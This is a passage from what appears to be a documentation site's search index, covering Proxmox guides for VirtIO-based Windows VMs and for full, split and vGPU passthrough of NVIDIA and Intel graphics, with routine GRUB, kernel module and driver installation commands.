Resize of Ceph disks is currently not supported (PR are welcome!) ", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/", "title": "Proxmox Windows Virtual Machine Configuration", "text": "This guide will walk you through configuring Windows 10 or Windows 11 Virtual Machines with VirtIO Disks and Networking using Proxmox. This configuration was tested to work with the GPU passthroughs
feature from one of the following guides:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - Cpu's GPU passthrough to VM guide (Intel) iGPU Split Passthrough - Splitting (CPU's GPU) to Multiple GPUs passthrough to VM guide ", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#prerequirements", "title": "Prerequirements", "text": "Before we begin, we need to download the VirtIO Drivers for Windows iso
. Upload it via the GUI as any other ISO file.
You can also use SSH and download it directly from the Proxmox server.
wget -P /var/lib/vz/template/iso https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso\n
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#create-a-vm-in-proxmox", "title": "Create a VM in Proxmox", "text": "Create a Virtual Machine in Proxmox as usual.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#general", "title": "General", "text": "Select Advanced
options.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#os", "title": "OS", "text": "Choose the iso file image for Windows 10 or 11. Change Type
to Microsoft Windows
and Version
to your Windows version.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#system", "title": "System", "text": "Change the Machine type to q35
, BIOS to UEFI
. Add TPM for Windows 11. Allocate Storage for UEFI BIOS and TPM.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#disks", "title": "Disks", "text": "Set Bus/Device to VirtIO Block
and Cache to Write Through
. Select the storage disk and the VM's disk size.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#cpu", "title": "CPU", "text": "Choose how many cores you want to use. Set The cpu Type to Host
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#memory", "title": "Memory", "text": "Allocate the memory for the VM. Make sure the Ballooning Device
is enabled.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#network", "title": "Network", "text": "Select your preferred network interface. Set the Model to VirtIO (paravirtualized)
.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#confirm", "title": "Confirm", "text": "Don't Start the VM after creating it.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#add-cddvd-to-vm", "title": "Add CD/DVD to VM", "text": "We will need to use the VirtIO Drivers for Windows iso
file to install the drivers while installing the Windows VM.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#hardware-before-installation", "title": "Hardware Before Installation", "text": "This is how the hardware of the VM should look before starting the Windows installation.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#windows-installation", "title": "Windows Installation", "text": "The Windows installation process is the same as any other Windows OS installation. The only caveat is that you need to install the drivers for the Storage devices and Network devices.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#choose-custom-install-windows-only-advanced", "title": "Choose Custom: Install Windows only (advanced)", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#missing-storage-devices", "title": "Missing Storage Devices", "text": "When prompted to select the storage device to install windows the device won't show since we are using the VirtIO storage. Select Load Driver
.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#load-the-virtio-drivers", "title": "Load the VirtIO Drivers", "text": "Browse to the VirtIO Disk, find a folder called viostor
and select the appropriate windows driver.
You should see a Red Hat VirtIO driver selected. Click Next
and install the driver.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#continue-with-the-installation-as-usual", "title": "Continue with the installation as usual", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#missing-network-driver", "title": "Missing Network Driver", "text": "Windows won't be able to load network drivers while installing. When prompted with something for connecting to the Internet, select I Don't have internet
and skip it. We will deal with the network drivers at post installation.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#post-installation", "title": "Post Installation", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#install-all-the-virtio-drivers-for-windows", "title": "Install all the VirtIO Drivers for Windows", "text": "Open the VirtIO CD and run the virtio-win-gt-x64.exe
, virtio-win-guest-tools
installer. This will install all the missing virtio drivers for the VM and guest OS tools.
After the installation your Device Manager should look like this without any errors.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#remove-the-virtio-cddvd-and-windows-iso", "title": "Remove the VirtIO CD/DVD and Windows iso", "text": "Power off the VM.
Remove the added CD/DVD for VirtIO iso.
Select Do not use any media
on the CD/DVD with the Windows iso.
At this point we are done with the installation of the Windows VM.
Follow those guides for utilizing a GPU passthrough to VM:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - Cpu's GPU passthrough to VM guide (Intel) GPU Split Passthrough - Splitting (Nvidia) to Multiple GPUs passthrough to VM guide ", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/", "title": "Proxmox GPU Passthrough to VM", "text": "", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#introduction", "title": "Introduction", "text": "GPU passthrough is a technology that allows the Linux kernel to present the internal PCI GPU directly to the virtual machine. The device behaves as if it were powered directly by the virtual machine, and the virtual machine detects the PCI device as if it were physically connected. We will cover how to enable GPU passthrough to a virtual machine in Proxmox VE.
Your mileage may vary depending on your hardware.
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#proxmox-configuration-for-gpu-passthrough", "title": "Proxmox Configuration for GPU Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Find the PCI address of the GPU Device. The following command will show the PCI address of the GPU devices in Proxmox server:
lspci -nnv | grep VGA\n
Find the GPU you want to passthrough; the result should be similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
What we are looking for is the PCI address of the GPU device. In this case it's 01:00.0
. 01:00.0
is only a part of a group of PCI devices on the GPU. We can list all the devices in the group 01:00
by using the following command:
lspci -s 01:00\n
The usual output will include VGA Device and Audio Device. In my case, we have a USB Controller and a Serial bus controller:
01:00.0 VGA compatible controller: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] (rev a1)\n01:00.1 Audio device: NVIDIA Corporation TU104 HD Audio Controller (rev a1)\n01:00.2 USB controller: NVIDIA Corporation TU104 USB 3.1 Host Controller (rev a1)\n01:00.3 Serial bus controller [0c80]: NVIDIA Corporation TU104 USB Type-C UCSI Controller (rev a1)\n
Now we need to get the id's of those devices. We can do this by using the following command:
lspci -s 01:00 -n\n
The output should look similar to this:
01:00.0 0300: 10de:1e81 (rev a1)\n01:00.1 0403: 10de:10f8 (rev a1)\n01:00.2 0c03: 10de:1ad8 (rev a1)\n01:00.3 0c80: 10de:1ad9 (rev a1)\n
What we are looking for are the pairs; we will use those ids to split the PCI Group into separate devices.
10de:1e81,10de:10f8,10de:1ad8,10de:1ad9\n
Now it's time to edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
For Intel CPUFor AMD CPU intel_iommu=on\n
amd_iommu=on\n
Then change it to look like this (Intel CPU example) and replace vfio-pci.ids=
with the ids for the GPU you want to passthrough:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio-pci.ids=10de:1e81,10de:10f8,10de:1ad8,10de:1ad9 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu\"\n
Save the config changes and then update GRUB.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
Check that the GPU is in a separate IOMMU Group by using the following command:
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
Now your Proxmox host should be ready for GPU passthrough!
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#windows-virtual-machine-gpu-passthrough-configuration", "title": "Windows Virtual Machine GPU Passthrough Configuration", "text": "For better results it's recommended to use this Windows 10/11 Virtual Machine configuration for Proxmox.
Limitations & Workarounds
In order for the GPU to function properly in the VM, you must disable Proxmox's Virtual Display - Set it to none
.
You will lose the ability to connect to the VM via Proxmox's Console.
Display must be connected to the physical output of the GPU for the Windows Host to initialize the GPU properly.
You can use a HDMI Dummy Plug as a workaround - It will present itself as a HDMI Display to the Windows Host.
Make sure you have alternative way to connect to the VM for example via Remote Desktop (RDP).
Find the PCI address of the GPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM's Machine
type should be configured to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the GPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, Primary GPU
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of GPU Driver for your GPU.
If all went well you should see the following output in Device Manager
and GPU-Z:
That's it!
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#linux-virtual-machine-gpu-passthrough-configuration", "title": "Linux Virtual Machine GPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS. for this guide.
From Proxmox Terminal find the PCI address of the GPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the NVIDIA
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM's Machine
type should be configured to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the Device
dropdown and select the GPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, PCI-Express
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the GPU passthrough was successful, you can use the following command in the VM:
sudo lspci -nnv | grep VGA\n
The output should include the GPU:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
Now we need to install the GPU Driver. I'll be covering the installation of Nvidia Drivers in the next example.
Search for the latest Nvidia Driver for your GPU.
sudo apt search nvidia-driver\n
In the next step we will install the Nvidia Driver v535.
Note
--no-install-recommends is important for Headless Server. nvidia-driver-535
will install xorg (GUI) --no-install-recommends
flag will prevent the GUI from being installed.
sudo apt install --no-install-recommends -y build-essential nvidia-driver-535 nvidia-headless-535 nvidia-utils-535 nvidia-cuda-toolkit\n
This will take a while to install. After the installation is complete, you should reboot the VM.
Now let's test the Driver initialization. Run the following command in the VM:
nvidia-smi && nvidia-smi -L\n
If all went well you should see the following output:
That's it! You should now be able to use the GPU for hardware acceleration inside the VM.
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
Reboot Proxmox to apply the changes
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/", "title": "iGPU Passthrough to VM (Intel Integrated Graphics)", "text": "", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#introduction", "title": "Introduction", "text": "Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows us to split the iGPU into two parts. We will be covering the Full iGPU Passthrough
. If you want to use the split iGPU GVT-g Passthrough
you can find the guide here.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#proxmox-configuration-for-igpu-full-passthrough", "title": "Proxmox Configuration for iGPU Full Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Warning
You will lose the ability to use the onboard graphics card to access the Proxmox's console since Proxmox won't be able to use the Intel's gpu
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on iommu=pt pcie_acs_override=downstream,multifunction initcall_blacklist=sysfb_init video=simplefb:off video=vesafb:off video=efifb:off video=vesa:off disable_vga=1 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu,snd_hda_intel,snd_hda_codec_hdmi,i915\"\n
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Save and exit the editor.
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#windows-virtual-machine-igpu-passthrough-configuration", "title": "Windows Virtual Machine iGPU Passthrough Configuration", "text": "For better results its recommend to use this Windows 10/11 Virtual Machine configuration for proxmox.
Find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM's Machine
type should be configured to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
, PCI-Express
and then click Add
.
Tip
I've found that the most consistent way to utilize the GPU acceleration is to disable Proxmox's Virtual Graphics card of the vm. The drawback of disabling the Virtual Graphics card is that it will not be able to access the vm via proxmox's vnc console. The workaround is to enable Remote Desktop (RDP) on the VM before disabling the Virtual Graphics card and accessing the VM via RDP or use any other remote desktop client. If you lose the ability to access the VM via RDP you can temporarily remove the GPU PCI Device and re-enable the virtual graphics card
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all went well you should see the following output in Device Manager
and GPU-Z:
That's it!
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#linux-virtual-machine-igpu-passthrough-configuration", "title": "Linux Virtual Machine iGPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
Open the Device
dropdown and select the iGPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA\n
The output should include the Intel iGPU:
00:10.0 VGA compatible controller [0300]: Intel Corporation UHD Graphics 630 (Desktop) [8086:3e92] (prog-if 00 [VGA controller])\n
Now we need to check if the GPU's Driver initialization is working.
cd /dev/dri && ls -la\n
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/", "title": "iGPU Split Passthrough (Intel Integrated Graphics)", "text": "", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#introduction", "title": "Introduction", "text": "Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU split passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
Supported CPUs
iGPU GVT-g Split Passthrough
is supported only on Intel's 5th generation to 10th generation CPUs!
Known supported CPU families:
Broadwell
Skylake
Kaby Lake
Coffee Lake
Comet Lake
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows us to split the iGPU into two parts. We will be covering the Split iGPU Passthrough
. If you want to use the Full iGPU Passthrough
you can find the guide here.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#proxmox-configuration-for-gvt-g-split-passthrough", "title": "Proxmox Configuration for GVT-g Split Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on i915.enable_gvt=1 iommu=pt pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu\"\n
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n\n# Modules required for Intel GVT-g Split\nkvmgt\n
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#windows-virtual-machine-igpu-passthrough-configuration", "title": "Windows Virtual Machine iGPU Passthrough Configuration", "text": "For better results its recommend to use this Windwos 10/11 Virutal Machine configuration for proxmox.
Find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM's Machine
type should be configured to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Open the VM's Console. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all went well you should see the following output in Device Manager
and GPU-Z:
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#linux-virtual-machine-igpu-passthrough-configuration", "title": "Linux Virtual Machine iGPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
The VM's Machine
type should be configured to i440fx. Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU to. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using its PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA\n
The output should include the Intel iGPU:
00:10.0 VGA compatible controller [0300]: Intel Corporation UHD Graphics 630 (Desktop) [8086:3e92] (prog-if 00 [VGA controller])\n
Now we need to check if the GPU's Driver initialization is working.
cd /dev/dri && ls -la\n
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/", "title": "vGPU Split Passthrough (Nvidia)", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#credit-and-thanks", "title": "Credit and Thanks", "text": "Thanks to @polloloco for creating and maintaining this guide.
Official GitLab repository: polloloco/vgpu-proxmox
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#nvidia-vgpu-with-the-grid", "title": "NVIDIA vGPU with the GRID", "text": "This document serves as a guide to install NVIDIA vGPU host drivers on the latest Proxmox VE version, at time of writing this its pve 8.0.
You can follow this guide if you have a vGPU supported card from this list, or if you are using a consumer GPU from the GeForce series or a non-vGPU qualified Quadro GPU. There are several sections with a title similar to \"Have a vGPU supported GPU? Read here\" in this document, make sure to read those very carefully as this is where the instructions differ for a vGPU qualified card and a consumer card.
